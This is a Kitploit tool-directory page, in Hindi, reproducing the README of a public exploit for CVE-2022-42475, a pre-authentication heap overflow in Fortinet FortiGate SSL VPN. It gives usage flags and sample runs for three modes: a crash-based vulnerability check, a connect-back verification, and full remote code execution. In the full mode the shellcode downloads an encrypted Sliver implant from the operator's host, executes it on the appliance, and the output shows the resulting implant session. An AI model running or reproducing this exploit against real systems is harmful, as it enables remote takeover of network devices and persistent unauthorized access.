Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/0xhaggis/cve-2022-42475
भेद्यता विश्लेषणशोषणरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंटबाइनरी शोषण
GitHub0xhaggis/cve-2022-42475

CVE-2022-42475

CVE-2022-42475 के लिए एक शोषण, फोर्टिनेट नेटवर्किंग उत्पादों में एक पूर्व-प्रमाणीकरण हीप ओवरफ़्लो

रिपॉजिटरी देखें
33153 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-42475

पृष्ठभूमि

यह ब्लॉग पोस्ट के लिए एक्सप्लॉइट है: https://bishopfox.com/blog/exploit-cve-2022-42475

संशोधित संस्करण

एक्सप्लॉइट का यह संस्करण आपके, हैकर, द्वारा ROP गैजेट्स आदि के लिए आवश्यक मेमोरी पतों की आपूर्ति किए बिना काम नहीं करेगा। इन आंकड़ों को निर्धारित करने का कार्य गोपनीय और Bishop Fox की संपत्ति है, और मैं इसे इस एक्सप्लॉइट के साथ प्रकाशित नहीं करूंगा (नहीं कर सकता)। मुझे विश्वास है कि आप समझते हैं!

संचालन के तरीके

  • केवल सत्यापन, कोई एक्सप्लॉइट नहीं। यह निर्धारित करता है कि लक्ष्य संवेदनशील है या नहीं। कोई पेलोड नहीं, कोई शेलकोड नहीं।
  • एक्सप्लॉइट, लेकिन केवल सत्यापन. यह सत्यापित करने के लिए एक निर्दोष कनेक्ट-बैक "पिंग" शेलकोड चलाएं कि लक्ष्य एक्सप्लॉइट योग्य है।
  • कनेक्ट-बैक बाइनरी स्टेजर के साथ एक्सप्लॉइट. शेलकोड एक्सप्लॉइट से वापस जुड़ता है, एक एन्क्रिप्टेड ऑपरेटर-आपूर्ति बाइनरी फ़ाइल (आमतौर पर https://gitub.com/BishopFox/Sliver) डाउनलोड करता है, बाइनरी को डिक्रिप्ट करता है, फिर execve(binary_file) को कॉल करता है।

नोट: वर्तमान में "केवल सत्यापन" मोड FortiOS के सभी ज्ञात संस्करणों पर काम करता है। हालांकि, एक्सप्लॉइट केवल 100D हार्डवेयर पर FortiOS 6.0.4 के विरुद्ध काम करते हैं। मैं अब BF में काम नहीं करता, इसलिए मैं विस्तारित एक्सप्लॉइट प्रकाशित नहीं कर सकता जो लगभग 18k लक्ष्यों का समर्थन करता हो।

आवश्यकताएँ

  • PyCrypto
  • pycryptodome
pip3 install PyCrypto
pip3 install pycryptodome

केवल सत्यापन

यह बग का शोषण करने का कोई प्रयास नहीं करेगा, बल्कि इसे एक क्रैश के रूप में ट्रिगर करेगा (दूरस्थ SSL VPN डेमॉन स्वचालित रूप से और तुरंत पुनः प्रारंभ होता है)। क्रैश का पता ह्युरिस्टिक रूप से लगाया जाता है और ऑपरेटर को रिपोर्ट किया जाता है।

इसे -v सत्यापन फ्लैग का उपयोग करके चलाएं:

$ ./x.py -t 192.168.0.10 -p 8443 -v

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] केवल-सत्यापन मोड में चल रहा है। कोई RCE नहीं।
[>] जाँच रहा है कि लक्ष्य संवेदनशील है या नहीं (इसमें 10 सेकंड लग सकते हैं)
[+] लक्ष्य '192.168.0.10:8443' संवेदनशील प्रतीत होता है

एक्सप्लॉइट, लेकिन सत्यापन (यह सुविधा वर्तमान में केवल FortiOS 6.0.4 on 100D उपकरणों के लिए उपलब्ध है)

यह बग को ट्रिगर करेगा, एक ROP श्रृंखला तैनात करेगा, और शेलकोड पर कूदेगा। शेलकोड निर्दोष है और इस प्रकार काम करता है:

  • एक्सप्लॉइट लक्ष्य से जुड़ता है और शेलकोड निष्पादित करने के लिए वल्न को ट्रिगर करता है
  • शेलकोड ऑपरेटर के IP:port पर वापस जुड़ता है
  • शेलकोड एक्सप्लॉइट को एक "hello" बाइट भेजता है: 0xbf
  • एक्सप्लॉइट शेलकोड को एक छोटी एन्क्रिप्टेड परीक्षण पेलोड प्रदान करता है (AES कुंजी प्रत्येक रन पर यादृच्छिक होती है)
  • शेलकोड पेलोड को डिक्रिप्ट करता है और इसे FortiGate उपकरण पर /tmp/x में सहेजता है
  • यदि पेलोड डिक्रिप्शन सफल होता है तो शेलकोड एक्सप्लॉइट को एक और 0xbf बाइट भेजता है
  • एक्सप्लॉइट बाइट पढ़ता है और कोड निष्पादन की पुष्टि करता है।

फ्लैग:

-t           लक्ष्य होस्ट/IP
-p           लक्ष्य पोर्ट
-e           एक्सप्लॉइट मोड
-c           केवल कनेक्ट-बैक मोड
-H और -P    ऑपरेटर का IP:port  (आवश्यक)
-s           FortiOS का सॉफ़्टवेयर संस्करण (आवश्यक)
-m           FortiOS चलाने वाला हार्डवेयर मॉडल
-d           डिबगिंग चालू करें

एक उदाहरण जहाँ हम सॉफ़्टवेयर संस्करण 6.0.4 और उपकरण मॉडल 100D दोनों चुनते हैं:

┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D                   130 ⨯

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] पेलोड को एन्क्रिप्ट करने के लिए यादृच्छिक 128-बिट AES कुंजी उत्पन्न कर रहा है
[+] पेलोड को एन्क्रिप्ट कर रहा है...
[+] कैश्ड शेलकोड का उपयोग कर रहा है। ताज़ा करने के लिए ./x.py संपादित करें ('shellcode.s' देखें)।
[+] 192.168.0.99:443 पर कनेक्ट-बैक के लिए कॉन्फ़िगर किया गया
[+] एन्क्रिप्टेड पेलोड लिसनर प्रारंभ कर रहा है...
[+] एक्सप्लॉइट की तैयारी कर रहा है...
[+] अनुरोध भेज रहा है!
[+] 'exploit_data.json' से गैजेट आयात कर रहा है
[<] लिसनर पोर्ट 443 से बंधा हुआ है, कनेक्ट-बैक की प्रतीक्षा कर रहा है...
[+] गैजेट सत्यापित कर रहा है...
[!] FortiOS '5.2.14' के लिए कोई कार्यात्मक हार्डवेयर मॉडल परिभाषित नहीं किए गए। हटा दिया गया।
[!] FortiOS '5.6.9' के लिए कोई कार्यात्मक हार्डवेयर मॉडल परिभाषित नहीं किए गए। हटा दिया गया।
[+] 797 लक्ष्य आयात किए गए:
[-]   6.0.4     [  1 targets ]   <=== 100D
[-]   5.2.14    [ 47 targets ]
[-]   5.6.9     [ 60 targets ]
[-]   6.0.13    [ 68 targets ]
[-]   6.0.14    [ 67 targets ]
[-]   6.0.15    [ 58 targets ]
[-]   6.0.8     [ 67 targets ]
[-]   6.2.11    [ 69 targets ]
[-]   6.2.7     [ 75 targets ]
[-]   6.4.10    [ 71 targets ]
[-]   6.4.2     [ 62 targets ]
[-]   6.4.3     [ 61 targets ]
[-]   6.4.6     [ 73 targets ]
[-]   6.4.9     [ 72 targets ]
[-]   7.0.4     [ 53 targets ]
[+] एक्सप्लॉइट प्रारंभ कर रहा है
[<] 192.168.0.10:22470 से आने वाला अनुरोध
[<] लक्ष्य से हैलो पैकेट प्राप्त हुआ!! मॉडल #: 100D
[<] 36 बाइट्स का एन्क्रिप्टेड पेलोड भेज रहा है
[<] पेलोड भेजना समाप्त (36 बाइट्स), प्रतिक्रिया की प्रतीक्षा कर रहा है...
[<] 192.168.0.10 से अपेक्षित प्रतिक्रिया ('100D') प्राप्त हुई
[<] लक्ष्य 100% विश्वास के साथ संवेदनशील है।
[+] सब कुछ समाप्त!

यदि आप हार्डवेयर मॉडल चुनने के लिए -m को छोड़ देते हैं, तो एक्सप्लॉइट निर्दिष्ट सॉफ़्टवेयर संस्करण के लिए सभी हार्डवेयर लक्ष्यों पर ब्रूट-फोर्स करेगा।

वैश्विक थर्मोन्यूक्लियर युद्ध

  • ऑपरेटर एक Sliver इम्प्लांट बाइनरी (Linux-आधारित) का स्थान निर्दिष्ट करता है
  • एक्सप्लॉइट लक्ष्य से जुड़ता है और शेलकोड निष्पादित करने के लिए वल्न को ट्रिगर करता है
  • शेलकोड ऑपरेटर के IP:port पर वापस जुड़ता है
  • शेलकोड एक्सप्लॉइट को एक "hello" बाइट भेजता है: 0xbf
  • एक्सप्लॉइट Sliver बाइनरी को एन्क्रिप्ट करता है और इसे शेलकोड को भेजता है
  • शेलकोड बाइनरी को डिक्रिप्ट करता है और इसे /tmp/x में सहेजता है
  • शेलकोड एक्सप्लॉइट को "success" 0xbf बाइट भेजता है
  • एक्सप्लॉइट बाइट पढ़ता है और कोड निष्पादन की पुष्टि करता है
  • शेलकोड execve("/tmp/x") को कॉल करता है
  • ???
  • लाभ!

फ्लैग:

-t           लक्ष्य होस्ट/IP
-p           लक्ष्य पोर्ट
-e           एक्सप्लॉइट मोड
-f filename  /path/to/binary/to/execve/on/target
-H और -P    कनेक्ट-बैक के लिए ऑपरेटर का IP:port (आवश्यक)
-s           FortiOS का सॉफ़्टवेयर संस्करण (आवश्यक)
-m           FortiOS चलाने वाला हार्डवेयर मॉडल
-d           डिबगिंग चालू करें

Sliver:

carl@pluto:~$ ./sliver-server_linux

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > mtls -l 8888

[*] Starting mTLS listener ...

[*] Successfully started job #1

एक्सप्लॉइट:

$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] एक्सप्लॉइट लक्ष्य पर execve("implant5") का प्रयास करेगा
...
[<] लक्ष्य 100% विश्वास के साथ संवेदनशील है।
[+] सब कुछ समाप्त.

और Sliver में वापस:

[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST

[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad

[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)

[server] sliver (implant5) > whoami

Logon ID: <err>

[server] sliver (implant5) > ls
टूल डाउनलोड करें